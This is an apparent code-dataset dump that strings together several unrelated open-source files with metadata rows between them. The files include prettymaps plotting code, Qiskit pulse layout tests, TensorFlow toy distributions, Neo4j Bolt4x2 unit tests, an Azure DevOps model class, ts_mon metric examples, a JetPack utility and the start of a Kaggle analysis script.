layers = dict(zip(k, v))
return layers
def draw_text(ax, text, x, y, **kwargs):
ax.text(x, y, text, **kwargs)
# Plot
def plot(
# Address
query,
# Whether to use a backup for the layers
backup = None,
# Custom postprocessing function on layers
postprocessing = None,
# Radius (in case of circular plot)
radius = None,
# Which layers to plot
layers = {'perimeter': {}},
# Drawing params for each layer (matplotlib params such as 'fc', 'ec', 'fill', etc.)
drawing_kwargs = {},
# OSM Caption parameters
osm_credit = {},
# Figure parameters
figsize = (10, 10), ax = None, title = None,
# Vsketch parameters
vsketch = None,
# Transform (translation & scale) params
x = None, y = None, scale_x = None, scale_y = None, rotation = None,
):
# Interpret query
query_mode = parse_query(query)
# Save maximum dilation for later use
dilations = [kwargs['dilate'] for kwargs in layers.values() if 'dilate' in kwargs]
max_dilation = max(dilations) if len(dilations) > 0 else 0
####################
### Fetch Layers ###
####################
# Use backup if provided
if backup is not None:
layers = backup
# Otherwise, fetch layers
else:
# Define base kwargs
if radius:
base_kwargs = {
'point': query if query_mode == 'coordinates' else ox.geocode(query),
'radius': radius
}
else:
base_kwargs = {
'perimeter': query if query_mode == 'polygon' else get_perimeter(query, by_osmid = query_mode == 'osmid')
}
# Fetch layers
layers = {
layer: get_layer(
layer,
**base_kwargs,
**(kwargs if type(kwargs) == dict else {})
)
for layer, kwargs in layers.items()
}
# Apply transformation to layers (translate & scale)
layers = transform(layers, x, y, scale_x, scale_y, rotation)
# Apply postprocessing step to layers
if postprocessing is not None:
layers = postprocessing(layers)
############
### Plot ###
############
# Matplot-specific stuff (only run if vsketch mode isn't activated)
if vsketch is None:
        # Adjust axis
ax.axis('off')
ax.axis('equal')
ax.autoscale()
# Plot background
if 'background' in drawing_kwargs:
xmin, ymin, xmax, ymax = layers['perimeter'].bounds
geom = scale(Polygon([
(xmin, ymin),
(xmin, ymax),
(xmax, ymax),
(xmax, ymin)
]), 2, 2)
if vsketch is None:
ax.add_patch(PolygonPatch(geom, **drawing_kwargs['background']))
else:
vsketch.geometry(geom)
# Adjust bounds
xmin, ymin, xmax, ymax = layers['perimeter'].buffer(max_dilation).bounds
dx, dy = xmax-xmin, ymax-ymin
if vsketch is None:
ax.set_xlim(xmin, xmax)
ax.set_ylim(ymin, ymax)
# Draw layers
for layer, shapes in layers.items():
kwargs = drawing_kwargs[layer] if layer in drawing_kwargs else {}
if 'hatch_c' in kwargs:
# Draw hatched shape
plot_shapes(shapes, ax, vsketch = vsketch, lw = 0, ec = kwargs['hatch_c'], **{k:v for k,v in kwargs.items() if k not in ['lw', 'ec', 'hatch_c']})
# Draw shape contour only
plot_shapes(shapes, ax, vsketch = vsketch, fill = False, **{k:v for k,v in kwargs.items() if k not in ['hatch_c', 'hatch', 'fill']})
else:
# Draw shape normally
plot_shapes(shapes, ax, vsketch = vsketch, **kwargs)
if ((isinstance(osm_credit, dict)) or (osm_credit is True)) and (vsketch is None):
x, y = figsize
d = .8*(x**2+y**2)**.5
draw_text(
ax,
(osm_credit['text'] if 'text' in osm_credit else 'data © OpenStreetMap contributors\ngithub.com/marceloprates/prettymaps'),
x = xmin + (osm_credit['x']*dx if 'x' in osm_credit else 0),
y = ymax - 4*d - (osm_credit['y']*dy if 'y' in osm_credit else 0),
fontfamily = (osm_credit['fontfamily'] if 'fontfamily' in osm_credit else 'Ubuntu Mono'),
fontsize = (osm_credit['fontsize']*d if 'fontsize' in osm_credit else d),
zorder = (osm_credit['zorder'] if 'zorder' in osm_credit else len(layers)+1),
**{k:v for k,v in osm_credit.items() if k not in ['text', 'x', 'y', 'fontfamily', 'fontsize', 'zorder']}
)
# Return perimeter
return layers
| 32.577075
| 157
| 0.577651
|
537227109d4cd709faf42599c9e608d841118cc1
| 8,515
|
py
|
Python
|
test/python/visualization/pulse_v2/test_layouts.py
|
Roshan-Thomas/qiskit-terra
|
77219b5c7b7146b1545c5e5190739b36f4064b2f
|
[
"Apache-2.0"
] | 1,599
|
2018-07-10T10:59:12.000Z
|
2022-03-31T23:56:25.000Z
|
test/python/visualization/pulse_v2/test_layouts.py
|
Roshan-Thomas/qiskit-terra
|
77219b5c7b7146b1545c5e5190739b36f4064b2f
|
[
"Apache-2.0"
] | 5,244
|
2018-07-10T06:20:13.000Z
|
2022-03-31T22:18:48.000Z
|
test/python/visualization/pulse_v2/test_layouts.py
|
Roshan-Thomas/qiskit-terra
|
77219b5c7b7146b1545c5e5190739b36f4064b2f
|
[
"Apache-2.0"
] | 1,409
|
2018-07-10T02:16:12.000Z
|
2022-03-31T09:01:32.000Z
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Tests for core modules of pulse drawer."""
from qiskit import pulse
from qiskit.test import QiskitTestCase
from qiskit.visualization.pulse_v2 import layouts, device_info
class TestChannelArrangement(QiskitTestCase):
"""Tests for channel mapping functions."""
def setUp(self) -> None:
super().setUp()
self.channels = [
pulse.DriveChannel(0),
pulse.DriveChannel(1),
pulse.DriveChannel(2),
pulse.MeasureChannel(1),
pulse.MeasureChannel(2),
pulse.AcquireChannel(1),
pulse.AcquireChannel(2),
pulse.ControlChannel(0),
pulse.ControlChannel(2),
pulse.ControlChannel(5),
]
self.formatter = {"control.show_acquire_channel": True}
self.device = device_info.OpenPulseBackendInfo(
name="test",
dt=1,
channel_frequency_map={
pulse.DriveChannel(0): 5.0e9,
pulse.DriveChannel(1): 5.1e9,
pulse.DriveChannel(2): 5.2e9,
                pulse.MeasureChannel(0): 7.0e9,
pulse.MeasureChannel(1): 7.1e9,
pulse.MeasureChannel(2): 7.2e9,
pulse.ControlChannel(0): 5.0e9,
pulse.ControlChannel(1): 5.1e9,
pulse.ControlChannel(2): 5.2e9,
pulse.ControlChannel(3): 5.3e9,
pulse.ControlChannel(4): 5.4e9,
pulse.ControlChannel(5): 5.5e9,
},
qubit_channel_map={
0: [
pulse.DriveChannel(0),
pulse.MeasureChannel(0),
pulse.AcquireChannel(0),
pulse.ControlChannel(0),
],
1: [
pulse.DriveChannel(1),
pulse.MeasureChannel(1),
pulse.AcquireChannel(1),
pulse.ControlChannel(1),
],
2: [
pulse.DriveChannel(2),
pulse.MeasureChannel(2),
pulse.AcquireChannel(2),
pulse.ControlChannel(2),
pulse.ControlChannel(3),
pulse.ControlChannel(4),
],
3: [
pulse.DriveChannel(3),
pulse.MeasureChannel(3),
pulse.AcquireChannel(3),
pulse.ControlChannel(5),
],
},
)
def test_channel_type_grouped_sort(self):
"""Test channel_type_grouped_sort."""
out_layout = layouts.channel_type_grouped_sort(
self.channels, formatter=self.formatter, device=self.device
)
ref_channels = [
[pulse.DriveChannel(0)],
[pulse.DriveChannel(1)],
[pulse.DriveChannel(2)],
[pulse.ControlChannel(0)],
[pulse.ControlChannel(2)],
[pulse.ControlChannel(5)],
[pulse.MeasureChannel(1)],
[pulse.MeasureChannel(2)],
[pulse.AcquireChannel(1)],
[pulse.AcquireChannel(2)],
]
ref_names = ["D0", "D1", "D2", "U0", "U2", "U5", "M1", "M2", "A1", "A2"]
ref = list(zip(ref_names, ref_channels))
self.assertListEqual(list(out_layout), ref)
def test_channel_index_sort(self):
"""Test channel_index_grouped_sort."""
out_layout = layouts.channel_index_grouped_sort(
self.channels, formatter=self.formatter, device=self.device
)
ref_channels = [
[pulse.DriveChannel(0)],
[pulse.ControlChannel(0)],
[pulse.DriveChannel(1)],
[pulse.MeasureChannel(1)],
[pulse.AcquireChannel(1)],
[pulse.DriveChannel(2)],
[pulse.ControlChannel(2)],
[pulse.MeasureChannel(2)],
[pulse.AcquireChannel(2)],
[pulse.ControlChannel(5)],
]
ref_names = ["D0", "U0", "D1", "M1", "A1", "D2", "U2", "M2", "A2", "U5"]
ref = list(zip(ref_names, ref_channels))
self.assertListEqual(list(out_layout), ref)
def test_channel_index_sort_grouped_control(self):
"""Test channel_index_grouped_sort_u."""
out_layout = layouts.channel_index_grouped_sort_u(
self.channels, formatter=self.formatter, device=self.device
)
ref_channels = [
[pulse.DriveChannel(0)],
[pulse.DriveChannel(1)],
[pulse.MeasureChannel(1)],
[pulse.AcquireChannel(1)],
[pulse.DriveChannel(2)],
[pulse.MeasureChannel(2)],
[pulse.AcquireChannel(2)],
[pulse.ControlChannel(0)],
[pulse.ControlChannel(2)],
[pulse.ControlChannel(5)],
]
ref_names = ["D0", "D1", "M1", "A1", "D2", "M2", "A2", "U0", "U2", "U5"]
ref = list(zip(ref_names, ref_channels))
self.assertListEqual(list(out_layout), ref)
def test_channel_qubit_index_sort(self):
"""Test qubit_index_sort."""
out_layout = layouts.qubit_index_sort(
self.channels, formatter=self.formatter, device=self.device
)
ref_channels = [
[pulse.DriveChannel(0), pulse.ControlChannel(0)],
[pulse.DriveChannel(1), pulse.MeasureChannel(1)],
[pulse.DriveChannel(2), pulse.MeasureChannel(2), pulse.ControlChannel(2)],
[pulse.ControlChannel(5)],
]
ref_names = ["Q0", "Q1", "Q2", "Q3"]
ref = list(zip(ref_names, ref_channels))
self.assertListEqual(list(out_layout), ref)
class TestHorizontalAxis(QiskitTestCase):
"""Tests for horizontal axis mapping functions."""
def test_time_map_in_ns(self):
"""Test for time_map_in_ns."""
time_window = (0, 1000)
breaks = [(100, 200)]
dt = 1e-9
haxis = layouts.time_map_in_ns(time_window=time_window, axis_breaks=breaks, dt=dt)
self.assertListEqual(list(haxis.window), [0, 900])
self.assertListEqual(list(haxis.axis_break_pos), [100])
ref_axis_map = {
0.0: "0",
180.0: "280",
360.0: "460",
540.0: "640",
720.0: "820",
900.0: "1000",
}
self.assertDictEqual(haxis.axis_map, ref_axis_map)
self.assertEqual(haxis.label, "Time (ns)")
def test_time_map_in_without_dt(self):
"""Test for time_map_in_ns when dt is not provided."""
time_window = (0, 1000)
breaks = [(100, 200)]
dt = None
haxis = layouts.time_map_in_ns(time_window=time_window, axis_breaks=breaks, dt=dt)
self.assertListEqual(list(haxis.window), [0, 900])
self.assertListEqual(list(haxis.axis_break_pos), [100])
ref_axis_map = {
0.0: "0",
180.0: "280",
360.0: "460",
540.0: "640",
720.0: "820",
900.0: "1000",
}
self.assertDictEqual(haxis.axis_map, ref_axis_map)
self.assertEqual(haxis.label, "System cycle time (dt)")
class TestFigureTitle(QiskitTestCase):
"""Tests for figure title generation."""
def setUp(self) -> None:
super().setUp()
self.device = device_info.OpenPulseBackendInfo(name="test_backend", dt=1e-9)
self.prog = pulse.Schedule(name="test_sched")
self.prog.insert(
0, pulse.Play(pulse.Constant(100, 0.1), pulse.DriveChannel(0)), inplace=True
)
def detail_title(self):
"""Test detail_title layout function."""
ref_title = "Name: test_sched, Duration: 100.0 ns, Backend: test_backend"
out = layouts.detail_title(self.prog, self.device)
self.assertEqual(out, ref_title)
def empty_title(self):
"""Test empty_title layout function."""
ref_title = ""
        out = layouts.empty_title(self.prog, self.device)
self.assertEqual(out, ref_title)
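# --- Worked illustration (hypothetical; not part of the original test module) ---
# How time_map_in_ns handles an axis break, matching the reference maps above:
# with time_window=(0, 1000) and a break over (100, 200), 100 samples are
# removed, the visible window shrinks to 900, and the tick drawn at position
# 180 is labelled with the original time 280 (dt=1e-9 converts dt units to ns).
#
# from qiskit.visualization.pulse_v2 import layouts
# haxis = layouts.time_map_in_ns(time_window=(0, 1000),
#                                axis_breaks=[(100, 200)], dt=1e-9)
# print(haxis.axis_map)  # {0.0: '0', 180.0: '280', ..., 900.0: '1000'}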
| 34.196787
| 90
| 0.556782
|
b4d475fffcbaa05906a8f3d4824e99bca0bb0c5a
| 4,730
|
py
|
Python
|
eim/small_problems_dists.py
|
kinoute/google-research
|
4a59cab927579ea9722e43252c695de5da4eb5e2
|
[
"Apache-2.0"
] | 11
|
2020-01-29T07:25:04.000Z
|
2022-03-05T16:01:21.000Z
|
eim/small_problems_dists.py
|
zhangyuezjx/google-research
|
4a59cab927579ea9722e43252c695de5da4eb5e2
|
[
"Apache-2.0"
] | 13
|
2020-01-28T22:19:53.000Z
|
2022-02-10T00:39:26.000Z
|
eim/small_problems_dists.py
|
zhangyuezjx/google-research
|
4a59cab927579ea9722e43252c695de5da4eb5e2
|
[
"Apache-2.0"
] | 2
|
2020-02-27T11:09:49.000Z
|
2021-08-25T07:32:15.000Z
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Synthetic datasets for EIM experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
from six.moves import range
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
NINE_GAUSSIANS_DIST = "nine_gaussians"
TWO_RINGS_DIST = "two_rings"
CHECKERBOARD_DIST = "checkerboard"
TARGET_DISTS = [NINE_GAUSSIANS_DIST, TWO_RINGS_DIST, CHECKERBOARD_DIST]
class Ring2D(tfd.Distribution):
"""2D Ring distribution."""
def __init__(self,
radius_dist=None,
dtype=tf.float32,
validate_args=False,
allow_nan_stats=True,
name="Ring"):
parameters = dict(locals())
loc = tf.zeros([2], dtype=dtype)
if radius_dist is None:
radius_dist = tfd.Normal(loc=1., scale=0.1)
self._loc = loc
self._radius_dist = radius_dist
super(Ring2D, self).__init__(
dtype=dtype,
reparameterization_type=tfd.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._loc],
name=name)
@property
def loc(self):
"""Distribution parameter for the mean."""
return self._loc
def _batch_shape_tensor(self):
return tf.broadcast_dynamic_shape(
        tf.shape(self._loc)[:-1], self._radius_dist.batch_shape_tensor())
def _batch_shape(self):
return tf.broadcast_static_shape(self._loc.get_shape()[:-1],
self._radius_dist.batch_shape)
def _event_shape_tensor(self):
return tf.constant([2], dtype=tf.int32)
def _event_shape(self):
return tf.TensorShape([2])
def _sample_n(self, n, seed=None):
new_shape = tf.concat([[n], self.batch_shape_tensor()], 0)
thetas = tf.random_uniform(
new_shape, seed=seed, dtype=self.dtype) * 2. * math.pi
rs = self._radius_dist.sample(new_shape, seed=seed)
vecs = tf.stack([tf.math.sin(thetas), tf.math.cos(thetas)], axis=-1)
sample = vecs * tf.expand_dims(rs, axis=-1)
return tf.cast(sample, self.dtype)
def _log_prob(self, event):
radii = tf.norm(event, axis=-1, ord=2)
return self._radius_dist.log_prob(radii) - tf.log(2 * math.pi * radii)
def two_rings_dist(scale=0.1):
r_dist = tfd.Mixture(
cat=tfd.Categorical(probs=[1., 1.]),
components=[
tfd.Normal(loc=0.6, scale=scale),
tfd.Normal(loc=1.3, scale=scale)
])
return Ring2D(radius_dist=r_dist)
def checkerboard_dist(num_splits=4):
"""Returns a checkerboard distribution."""
bounds = np.linspace(-2., 2., num=(num_splits + 1), endpoint=True)
uniforms = []
for i in range(num_splits):
for j in range(num_splits):
if ((i % 2 == 0 and j % 2 == 0) or (i % 2 != 0 and j % 2 != 0)):
low = tf.convert_to_tensor([bounds[i], bounds[j]], dtype=tf.float32)
high = tf.convert_to_tensor([bounds[i + 1], bounds[j + 1]],
dtype=tf.float32)
u = tfd.Uniform(low=low, high=high)
u = tfd.Independent(u, reinterpreted_batch_ndims=1)
uniforms.append(u)
return tfd.Mixture(
cat=tfd.Categorical(probs=[1.] * len(uniforms)), components=uniforms)
def nine_gaussians_dist(variance=0.1):
"""Creates a mixture of 9 2-D gaussians on a 3x3 grid centered at 0."""
components = []
for i in [-1., 0., 1.]:
for j in [-1., 0., 1.]:
loc = tf.constant([i, j], dtype=tf.float32)
scale = tf.ones_like(loc) * tf.sqrt(variance)
components.append(tfd.MultivariateNormalDiag(loc=loc, scale_diag=scale))
return tfd.Mixture(
cat=tfd.Categorical(probs=tf.ones([9], dtype=tf.float32) / 9.),
components=components)
def get_target_distribution(name, nine_gaussians_variance=0.01):
if name == NINE_GAUSSIANS_DIST:
return nine_gaussians_dist(variance=nine_gaussians_variance)
elif name == TWO_RINGS_DIST:
return two_rings_dist()
elif name == CHECKERBOARD_DIST:
return checkerboard_dist()
else:
raise ValueError("Invalid target name.")
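# --- Hypothetical usage sketch (not part of the original module) ---
# The module is written against TF1-style graph execution (tf.random_uniform,
# tf.log above), so drawing samples from one of the target densities would
# look roughly like this:
#
# dist = get_target_distribution(TWO_RINGS_DIST)
# samples = dist.sample(1024)
# log_p = dist.log_prob(samples)
# with tf.Session() as sess:
#   xs, lps = sess.run([samples, log_p])  # xs.shape == (1024, 2)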
| 33.546099
| 78
| 0.674841
|
0c0b1a9a4f544d088a00f4900d5baae9d960fd63
| 6,268
|
py
|
Python
|
tests/unit/io/test_class_bolt4x2.py
|
glesage/neo4j-python-driver
|
540af77063f0ffddc6d73d371bcde90c4e75032d
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/io/test_class_bolt4x2.py
|
glesage/neo4j-python-driver
|
540af77063f0ffddc6d73d371bcde90c4e75032d
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/io/test_class_bolt4x2.py
|
glesage/neo4j-python-driver
|
540af77063f0ffddc6d73d371bcde90c4e75032d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (c) "Neo4j"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from neo4j.io._bolt4 import Bolt4x2
from neo4j.conf import PoolConfig
@pytest.mark.parametrize("set_stale", (True, False))
def test_conn_is_stale(fake_socket, set_stale):
address = ("127.0.0.1", 7687)
max_connection_lifetime = 0
connection = Bolt4x2(address, fake_socket(address), max_connection_lifetime)
if set_stale:
connection.set_stale()
assert connection.stale() is True
@pytest.mark.parametrize("set_stale", (True, False))
def test_conn_is_not_stale_if_not_enabled(fake_socket, set_stale):
address = ("127.0.0.1", 7687)
max_connection_lifetime = -1
connection = Bolt4x2(address, fake_socket(address), max_connection_lifetime)
if set_stale:
connection.set_stale()
assert connection.stale() is set_stale
@pytest.mark.parametrize("set_stale", (True, False))
def test_conn_is_not_stale(fake_socket, set_stale):
address = ("127.0.0.1", 7687)
max_connection_lifetime = 999999999
connection = Bolt4x2(address, fake_socket(address), max_connection_lifetime)
if set_stale:
connection.set_stale()
assert connection.stale() is set_stale
def test_db_extra_in_begin(fake_socket):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.begin(db="something")
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x11"
assert len(fields) == 1
assert fields[0] == {"db": "something"}
def test_db_extra_in_run(fake_socket):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.run("", {}, db="something")
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x10"
assert len(fields) == 3
assert fields[0] == ""
assert fields[1] == {}
assert fields[2] == {"db": "something"}
def test_n_extra_in_discard(fake_socket):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.discard(n=666)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x2F"
assert len(fields) == 1
assert fields[0] == {"n": 666}
@pytest.mark.parametrize(
"test_input, expected",
[
(666, {"n": -1, "qid": 666}),
(-1, {"n": -1}),
]
)
def test_qid_extra_in_discard(fake_socket, test_input, expected):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.discard(qid=test_input)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x2F"
assert len(fields) == 1
assert fields[0] == expected
@pytest.mark.parametrize(
"test_input, expected",
[
(777, {"n": 666, "qid": 777}),
(-1, {"n": 666}),
]
)
def test_n_and_qid_extras_in_discard(fake_socket, test_input, expected):
    # python -m pytest tests/unit/io/test_class_bolt4x2.py -s -k test_n_and_qid_extras_in_discard
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.discard(n=666, qid=test_input)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x2F"
assert len(fields) == 1
assert fields[0] == expected
@pytest.mark.parametrize(
"test_input, expected",
[
(666, {"n": 666}),
(-1, {"n": -1}),
]
)
def test_n_extra_in_pull(fake_socket, test_input, expected):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.pull(n=test_input)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x3F"
assert len(fields) == 1
assert fields[0] == expected
@pytest.mark.parametrize(
"test_input, expected",
[
(777, {"n": -1, "qid": 777}),
(-1, {"n": -1}),
]
)
def test_qid_extra_in_pull(fake_socket, test_input, expected):
    # python -m pytest tests/unit/io/test_class_bolt4x2.py -s -k test_qid_extra_in_pull
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.pull(qid=test_input)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x3F"
assert len(fields) == 1
assert fields[0] == expected
def test_n_and_qid_extras_in_pull(fake_socket):
address = ("127.0.0.1", 7687)
socket = fake_socket(address)
connection = Bolt4x2(address, socket, PoolConfig.max_connection_lifetime)
connection.pull(n=666, qid=777)
connection.send_all()
tag, fields = socket.pop_message()
assert tag == b"\x3F"
assert len(fields) == 1
assert fields[0] == {"n": 666, "qid": 777}
def test_hello_passes_routing_metadata(fake_socket_pair):
address = ("127.0.0.1", 7687)
sockets = fake_socket_pair(address)
sockets.server.send_message(0x70, {"server": "Neo4j/4.2.0"})
connection = Bolt4x2(address, sockets.client, PoolConfig.max_connection_lifetime,
routing_context={"foo": "bar"})
connection.hello()
tag, fields = sockets.server.pop_message()
assert tag == 0x01
assert len(fields) == 1
assert fields[0]["routing"] == {"foo": "bar"}
| 31.817259
| 97
| 0.676771
|
5cc6eae053d4c551668a17c685d5353aa61493c3
| 1,411
|
py
|
Python
|
venv/lib/python3.8/site-packages/vsts/test/v4_0/models/test_results_query.py
|
amcclead7336/Enterprise_Data_Science_Final
|
ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28
|
[
"Unlicense",
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/vsts/test/v4_0/models/test_results_query.py
|
amcclead7336/Enterprise_Data_Science_Final
|
ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28
|
[
"Unlicense",
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/vsts/test/v4_0/models/test_results_query.py
|
amcclead7336/Enterprise_Data_Science_Final
|
ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28
|
[
"Unlicense",
"MIT"
] | 2
|
2021-05-23T16:46:31.000Z
|
2021-05-26T23:51:09.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest.serialization import Model
class TestResultsQuery(Model):
"""TestResultsQuery.
:param fields:
:type fields: list of str
:param results:
:type results: list of :class:`TestCaseResult <test.v4_0.models.TestCaseResult>`
:param results_filter:
:type results_filter: :class:`ResultsFilter <test.v4_0.models.ResultsFilter>`
"""
_attribute_map = {
'fields': {'key': 'fields', 'type': '[str]'},
'results': {'key': 'results', 'type': '[TestCaseResult]'},
'results_filter': {'key': 'resultsFilter', 'type': 'ResultsFilter'}
}
def __init__(self, fields=None, results=None, results_filter=None):
super(TestResultsQuery, self).__init__()
self.fields = fields
self.results = results
self.results_filter = results_filter
| 41.5
| 95
| 0.529412
|
22240314fda50cbe3bfd6fc427bfb572ff601465
| 1,584
|
py
|
Python
|
infra/tools/metric_tool/test/data/normal_case_2.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
infra/tools/metric_tool/test/data/normal_case_2.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
infra/tools/metric_tool/test/data/normal_case_2.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Example containing all metrics, all with descriptions.
Tests assume the description contains the name of the metric, without
the prefix.
"""
from infra_libs.ts_mon import BooleanMetric, CounterMetric
from infra_libs.ts_mon import CumulativeDistributionMetric, CumulativeMetric
from infra_libs.ts_mon import DistributionMetric, FloatMetric
from infra_libs.ts_mon import GaugeMetric, NonCumulativeDistributionMetric
from infra_libs.ts_mon import StringMetric
metric1 = BooleanMetric('my/metric1', description='metric1')
metric2 = CounterMetric('my/metric2', description='metric2')
metric3 = CumulativeDistributionMetric('my/metric3',
description='metric3')
metric4 = CumulativeMetric('my/metric4', description='metric4')
# Add a wrapping function to check that we're finding those as well.
def nice_function():
# Checking that we really ignore comments.
# FloatMetric('my/metric11', description='metric11')
metric6 = FloatMetric('my/metric6', description='metric6')
metric7 = GaugeMetric('my/metric7', description='metric7')
metric8 = NonCumulativeDistributionMetric('my/metric8',
description='metric8')
metric9 = StringMetric('my/metric9', description='metric9')
# Use all variables to silence pylint.
print metric6, metric7, metric8, metric9
# Some unrelated code to add noise
if __name__ == '__main__':
pass
| 38.634146
| 76
| 0.746843
|
86fdc763a67ef0a2a47e99f06e84d61f16fa8834
| 1,464
|
py
|
Python
|
src/pilot/utils.py
|
digambar15/JetPack
|
808d4a84076a3700b0ba9f07c512e99e81c5c9eb
|
[
"Apache-2.0"
] | 1
|
2020-07-16T10:03:56.000Z
|
2020-07-16T10:03:56.000Z
|
src/pilot/utils.py
|
MuhammadAsif1/JetPack
|
a8fc31c4f6a921958c81e9c2e2b17b146b34e35c
|
[
"Apache-2.0"
] | 4
|
2018-08-23T15:02:59.000Z
|
2018-10-11T07:58:33.000Z
|
src/pilot/utils.py
|
digambar15/JetPack
|
808d4a84076a3700b0ba9f07c512e99e81c5c9eb
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2017-2020 Dell Inc. or its subsidiaries.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from constants import Constants
class Utils:
@staticmethod
def get_model_properties(
json_filename=Constants.MODEL_PROPERTIES_FILENAME):
model_properties = None
expanded_filename = os.path.expanduser(json_filename)
try:
with open(expanded_filename, 'r') as f:
try:
model_properties = json.load(f)
except ValueError as ex:
ex.message = "Could not deserialize model properties " \
"file {}: {}".format(expanded_filename, ex.message)
raise
except IOError as ex:
ex.message = "Could not open model properties file {}: {}".format(
expanded_filename, ex.message)
raise
return model_properties
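# --- Hypothetical usage sketch (not part of the original module) ---
# get_model_properties simply deserializes a JSON file, annotating any
# IOError/ValueError with the expanded path before re-raising; the path below
# is an assumption for illustration only.
#
# props = Utils.get_model_properties("~/pilot/model_properties.json")
# if props is not None:
#     print(sorted(props.keys()))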
| 34.046512
| 78
| 0.651639
|
a8926f6a515578a718362877f3a6d658cbd134c2
| 2,626
|
py
|
Python
|
downloaded_kernels/university_rankings/kernel_24.py
|
josepablocam/common-code-extraction
|
a6978fae73eee8ece6f1db09f2f38cf92f03b3ad
|
[
"MIT"
] | null | null | null |
downloaded_kernels/university_rankings/kernel_24.py
|
josepablocam/common-code-extraction
|
a6978fae73eee8ece6f1db09f2f38cf92f03b3ad
|
[
"MIT"
] | null | null | null |
downloaded_kernels/university_rankings/kernel_24.py
|
josepablocam/common-code-extraction
|
a6978fae73eee8ece6f1db09f2f38cf92f03b3ad
|
[
"MIT"
] | 2
|
2021-07-12T00:48:08.000Z
|
2021-08-11T12:53:05.000Z
|
######### INSTRUCTIONS #########
#
# Fork this script and change the university name to see what rank it gets:
#
my_university_name = ["Indiana University Bloomington"]
#
# Look at the log for a full list of universities you can choose from.
#
# If your university is listed under multiple names, you can combine as many names as you want like this:
# my_university_name = ["The Johns Hopkins University", "Johns Hopkins University"]
#
################################
# Import Packages
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import seaborn as sns
import matplotlib.pyplot as plt
sns.set(style="ticks", color_codes=True)
plt.rcParams['figure.figsize'] = 16, 12
# Import Data
timesData = pd.read_csv("../input/timesData.csv")
